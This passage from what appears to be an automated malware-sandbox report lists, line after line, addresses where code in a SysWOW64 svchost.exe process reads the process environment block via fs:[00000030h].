Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038566E0 mov eax, dword ptr fs:[00000030h]	2_2_038566E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AC6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AC6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904600 mov eax, dword ptr fs:[00000030h]	2_2_03904600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C620 mov eax, dword ptr fs:[00000030h]	2_2_0386C620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830630 mov eax, dword ptr fs:[00000030h]	2_2_03830630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860630 mov eax, dword ptr fs:[00000030h]	2_2_03860630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8633 mov esi, dword ptr fs:[00000030h]	2_2_038B8633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8633 mov eax, dword ptr fs:[00000030h]	2_2_038B8633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8633 mov eax, dword ptr fs:[00000030h]	2_2_038B8633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C640 mov eax, dword ptr fs:[00000030h]	2_2_0386C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C640 mov eax, dword ptr fs:[00000030h]	2_2_0386C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386265C mov eax, dword ptr fs:[00000030h]	2_2_0386265C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386265C mov ecx, dword ptr fs:[00000030h]	2_2_0386265C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386265C mov eax, dword ptr fs:[00000030h]	2_2_0386265C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386666D mov esi, dword ptr fs:[00000030h]	2_2_0386666D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386666D mov eax, dword ptr fs:[00000030h]	2_2_0386666D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386666D mov eax, dword ptr fs:[00000030h]	2_2_0386666D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE660 mov eax, dword ptr fs:[00000030h]	2_2_038BE660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830670 mov eax, dword ptr fs:[00000030h]	2_2_03830670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872670 mov eax, dword ptr fs:[00000030h]	2_2_03872670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872670 mov eax, dword ptr fs:[00000030h]	2_2_03872670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE588 mov eax, dword ptr fs:[00000030h]	2_2_038AE588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE588 mov eax, dword ptr fs:[00000030h]	2_2_038AE588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A580 mov eax, dword ptr fs:[00000030h]	2_2_0386A580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A580 mov eax, dword ptr fs:[00000030h]	2_2_0386A580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862594 mov eax, dword ptr fs:[00000030h]	2_2_03862594
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC592 mov eax, dword ptr fs:[00000030h]	2_2_038BC592
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B85AA mov eax, dword ptr fs:[00000030h]	2_2_038B85AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038345B0 mov eax, dword ptr fs:[00000030h]	2_2_038345B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038345B0 mov eax, dword ptr fs:[00000030h]	2_2_038345B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5C6 mov eax, dword ptr fs:[00000030h]	2_2_0386C5C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05C6 mov eax, dword ptr fs:[00000030h]	2_2_038B05C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038665D0 mov eax, dword ptr fs:[00000030h]	2_2_038665D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5E7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5E7 mov eax, dword ptr fs:[00000030h]	2_2_0386A5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC5FC mov eax, dword ptr fs:[00000030h]	2_2_038BC5FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E507 mov eax, dword ptr fs:[00000030h]	2_2_0385E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832500 mov eax, dword ptr fs:[00000030h]	2_2_03832500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C50D mov eax, dword ptr fs:[00000030h]	2_2_0386C50D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C50D mov eax, dword ptr fs:[00000030h]	2_2_0386C50D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC51D mov eax, dword ptr fs:[00000030h]	2_2_038BC51D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384252B mov eax, dword ptr fs:[00000030h]	2_2_0384252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872539 mov eax, dword ptr fs:[00000030h]	2_2_03872539
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E547 mov eax, dword ptr fs:[00000030h]	2_2_0384E547
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866540 mov eax, dword ptr fs:[00000030h]	2_2_03866540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868540 mov eax, dword ptr fs:[00000030h]	2_2_03868540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383254C mov eax, dword ptr fs:[00000030h]	2_2_0383254C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6550 mov eax, dword ptr fs:[00000030h]	2_2_038C6550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA553 mov eax, dword ptr fs:[00000030h]	2_2_038FA553
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C560 mov eax, dword ptr fs:[00000030h]	2_2_0384C560
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830485 mov ecx, dword ptr fs:[00000030h]	2_2_03830485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386648A mov eax, dword ptr fs:[00000030h]	2_2_0386648A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386648A mov eax, dword ptr fs:[00000030h]	2_2_0386648A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386648A mov eax, dword ptr fs:[00000030h]	2_2_0386648A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC490 mov eax, dword ptr fs:[00000030h]	2_2_038BC490
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038324A2 mov eax, dword ptr fs:[00000030h]	2_2_038324A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038324A2 mov ecx, dword ptr fs:[00000030h]	2_2_038324A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644A8 mov eax, dword ptr fs:[00000030h]	2_2_038644A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C84BB mov eax, dword ptr fs:[00000030h]	2_2_038C84BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E4BC mov eax, dword ptr fs:[00000030h]	2_2_0386E4BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038544D1 mov eax, dword ptr fs:[00000030h]	2_2_038544D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038544D1 mov eax, dword ptr fs:[00000030h]	2_2_038544D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E4EF mov eax, dword ptr fs:[00000030h]	2_2_0386E4EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E4EF mov eax, dword ptr fs:[00000030h]	2_2_0386E4EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364F0 mov eax, dword ptr fs:[00000030h]	2_2_038364F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D44F8 mov eax, dword ptr fs:[00000030h]	2_2_038D44F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D44F8 mov eax, dword ptr fs:[00000030h]	2_2_038D44F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A4F0 mov eax, dword ptr fs:[00000030h]	2_2_0386A4F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A4F0 mov eax, dword ptr fs:[00000030h]	2_2_0386A4F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE4F2 mov eax, dword ptr fs:[00000030h]	2_2_038BE4F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE4F2 mov eax, dword ptr fs:[00000030h]	2_2_038BE4F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6400 mov eax, dword ptr fs:[00000030h]	2_2_038C6400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6400 mov eax, dword ptr fs:[00000030h]	2_2_038C6400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382640D mov eax, dword ptr fs:[00000030h]	2_2_0382640D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445 mov eax, dword ptr fs:[00000030h]	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445 mov eax, dword ptr fs:[00000030h]	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445 mov eax, dword ptr fs:[00000030h]	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445 mov eax, dword ptr fs:[00000030h]	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445 mov eax, dword ptr fs:[00000030h]	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840445 mov eax, dword ptr fs:[00000030h]	2_2_03840445
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0443 mov eax, dword ptr fs:[00000030h]	2_2_038B0443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E45E mov eax, dword ptr fs:[00000030h]	2_2_0385E45E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E45E mov eax, dword ptr fs:[00000030h]	2_2_0385E45E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E45E mov eax, dword ptr fs:[00000030h]	2_2_0385E45E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E45E mov eax, dword ptr fs:[00000030h]	2_2_0385E45E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E45E mov eax, dword ptr fs:[00000030h]	2_2_0385E45E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE461 mov eax, dword ptr fs:[00000030h]	2_2_038BE461
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA464 mov eax, dword ptr fs:[00000030h]	2_2_038FA464
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838470 mov eax, dword ptr fs:[00000030h]	2_2_03838470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838470 mov eax, dword ptr fs:[00000030h]	2_2_03838470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8BBE mov eax, dword ptr fs:[00000030h]	2_2_038F8BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8BBE mov eax, dword ptr fs:[00000030h]	2_2_038F8BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8BBE mov eax, dword ptr fs:[00000030h]	2_2_038F8BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8BBE mov eax, dword ptr fs:[00000030h]	2_2_038F8BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382EBC0 mov eax, dword ptr fs:[00000030h]	2_2_0382EBC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4BC0 mov eax, dword ptr fs:[00000030h]	2_2_038B4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4BC0 mov eax, dword ptr fs:[00000030h]	2_2_038B4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4BC0 mov eax, dword ptr fs:[00000030h]	2_2_038B4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4BC0 mov eax, dword ptr fs:[00000030h]	2_2_038B4BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D6BDE mov ebx, dword ptr fs:[00000030h]	2_2_038D6BDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D6BDE mov eax, dword ptr fs:[00000030h]	2_2_038D6BDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858BD1 mov eax, dword ptr fs:[00000030h]	2_2_03858BD1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858BD1 mov eax, dword ptr fs:[00000030h]	2_2_03858BD1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904BE0 mov eax, dword ptr fs:[00000030h]	2_2_03904BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838B10 mov eax, dword ptr fs:[00000030h]	2_2_03838B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838B10 mov eax, dword ptr fs:[00000030h]	2_2_03838B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838B10 mov eax, dword ptr fs:[00000030h]	2_2_03838B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840B10 mov eax, dword ptr fs:[00000030h]	2_2_03840B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840B10 mov eax, dword ptr fs:[00000030h]	2_2_03840B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840B10 mov eax, dword ptr fs:[00000030h]	2_2_03840B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840B10 mov eax, dword ptr fs:[00000030h]	2_2_03840B10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB1C mov eax, dword ptr fs:[00000030h]	2_2_0385EB1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB1E mov eax, dword ptr fs:[00000030h]	2_2_0382CB1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CB20 mov eax, dword ptr fs:[00000030h]	2_2_0386CB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCB20 mov eax, dword ptr fs:[00000030h]	2_2_038BCB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCB20 mov eax, dword ptr fs:[00000030h]	2_2_038BCB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCB20 mov eax, dword ptr fs:[00000030h]	2_2_038BCB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AB70 mov eax, dword ptr fs:[00000030h]	2_2_0383AB70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AB70 mov eax, dword ptr fs:[00000030h]	2_2_0383AB70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AB70 mov eax, dword ptr fs:[00000030h]	2_2_0383AB70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AB70 mov eax, dword ptr fs:[00000030h]	2_2_0383AB70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AB70 mov eax, dword ptr fs:[00000030h]	2_2_0383AB70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383AB70 mov eax, dword ptr fs:[00000030h]	2_2_0383AB70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836B70 mov eax, dword ptr fs:[00000030h]	2_2_03836B70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836B70 mov eax, dword ptr fs:[00000030h]	2_2_03836B70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836B70 mov eax, dword ptr fs:[00000030h]	2_2_03836B70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B67 mov eax, dword ptr fs:[00000030h]	2_2_03904B67
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E6B77 mov eax, dword ptr fs:[00000030h]	2_2_038E6B77
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864B79 mov eax, dword ptr fs:[00000030h]	2_2_03864B79
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E6A80 mov eax, dword ptr fs:[00000030h]	2_2_038E6A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840ACE mov eax, dword ptr fs:[00000030h]	2_2_03840ACE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840ACE mov eax, dword ptr fs:[00000030h]	2_2_03840ACE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4AC2 mov eax, dword ptr fs:[00000030h]	2_2_038D4AC2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D0AE0 mov eax, dword ptr fs:[00000030h]	2_2_038D0AE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2AE0 mov eax, dword ptr fs:[00000030h]	2_2_038D2AE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2AE0 mov eax, dword ptr fs:[00000030h]	2_2_038D2AE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850AEB mov eax, dword ptr fs:[00000030h]	2_2_03850AEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850AEB mov eax, dword ptr fs:[00000030h]	2_2_03850AEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850AEB mov eax, dword ptr fs:[00000030h]	2_2_03850AEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AED mov eax, dword ptr fs:[00000030h]	2_2_03830AED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AED mov eax, dword ptr fs:[00000030h]	2_2_03830AED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AED mov eax, dword ptr fs:[00000030h]	2_2_03830AED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0AFF mov eax, dword ptr fs:[00000030h]	2_2_038B0AFF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0AFF mov eax, dword ptr fs:[00000030h]	2_2_038B0AFF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0AFF mov eax, dword ptr fs:[00000030h]	2_2_038B0AFF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904AE8 mov eax, dword ptr fs:[00000030h]	2_2_03904AE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AA0E mov eax, dword ptr fs:[00000030h]	2_2_0386AA0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AA0E mov eax, dword ptr fs:[00000030h]	2_2_0386AA0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA40 mov eax, dword ptr fs:[00000030h]	2_2_0385EA40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA40 mov eax, dword ptr fs:[00000030h]	2_2_0385EA40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038CAA40 mov eax, dword ptr fs:[00000030h]	2_2_038CAA40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038CAA40 mov eax, dword ptr fs:[00000030h]	2_2_038CAA40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4A57 mov eax, dword ptr fs:[00000030h]	2_2_038B4A57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4A57 mov eax, dword ptr fs:[00000030h]	2_2_038B4A57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C98F mov eax, dword ptr fs:[00000030h]	2_2_0386C98F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C98F mov eax, dword ptr fs:[00000030h]	2_2_0386C98F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C98F mov eax, dword ptr fs:[00000030h]	2_2_0386C98F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D0980 mov eax, dword ptr fs:[00000030h]	2_2_038D0980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D0980 mov eax, dword ptr fs:[00000030h]	2_2_038D0980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383E9A0 mov eax, dword ptr fs:[00000030h]	2_2_0383E9A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B89A0 mov eax, dword ptr fs:[00000030h]	2_2_038B89A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038689B0 mov edx, dword ptr fs:[00000030h]	2_2_038689B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69B0 mov eax, dword ptr fs:[00000030h]	2_2_038C69B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69B0 mov eax, dword ptr fs:[00000030h]	2_2_038C69B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C69B0 mov ecx, dword ptr fs:[00000030h]	2_2_038C69B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038389C0 mov eax, dword ptr fs:[00000030h]	2_2_038389C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038389C0 mov eax, dword ptr fs:[00000030h]	2_2_038389C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039029CF mov eax, dword ptr fs:[00000030h]	2_2_039029CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039029CF mov eax, dword ptr fs:[00000030h]	2_2_039029CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309F0 mov eax, dword ptr fs:[00000030h]	2_2_038309F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649F0 mov eax, dword ptr fs:[00000030h]	2_2_038649F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038649F0 mov eax, dword ptr fs:[00000030h]	2_2_038649F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886912 mov eax, dword ptr fs:[00000030h]	2_2_03886912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862919 mov eax, dword ptr fs:[00000030h]	2_2_03862919
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862919 mov eax, dword ptr fs:[00000030h]	2_2_03862919
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F892E mov eax, dword ptr fs:[00000030h]	2_2_038F892E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F892E mov eax, dword ptr fs:[00000030h]	2_2_038F892E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC920 mov ecx, dword ptr fs:[00000030h]	2_2_038AC920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC920 mov eax, dword ptr fs:[00000030h]	2_2_038AC920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC920 mov eax, dword ptr fs:[00000030h]	2_2_038AC920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC920 mov eax, dword ptr fs:[00000030h]	2_2_038AC920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388693A mov eax, dword ptr fs:[00000030h]	2_2_0388693A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388693A mov eax, dword ptr fs:[00000030h]	2_2_0388693A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388693A mov eax, dword ptr fs:[00000030h]	2_2_0388693A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390492D mov eax, dword ptr fs:[00000030h]	2_2_0390492D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C944 mov eax, dword ptr fs:[00000030h]	2_2_0386C944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E94E mov eax, dword ptr fs:[00000030h]	2_2_0385E94E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854955 mov eax, dword ptr fs:[00000030h]	2_2_03854955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854955 mov eax, dword ptr fs:[00000030h]	2_2_03854955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C958 mov eax, dword ptr fs:[00000030h]	2_2_0386C958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384096B mov eax, dword ptr fs:[00000030h]	2_2_0384096B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384096B mov eax, dword ptr fs:[00000030h]	2_2_0384096B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836970 mov eax, dword ptr fs:[00000030h]	2_2_03836970
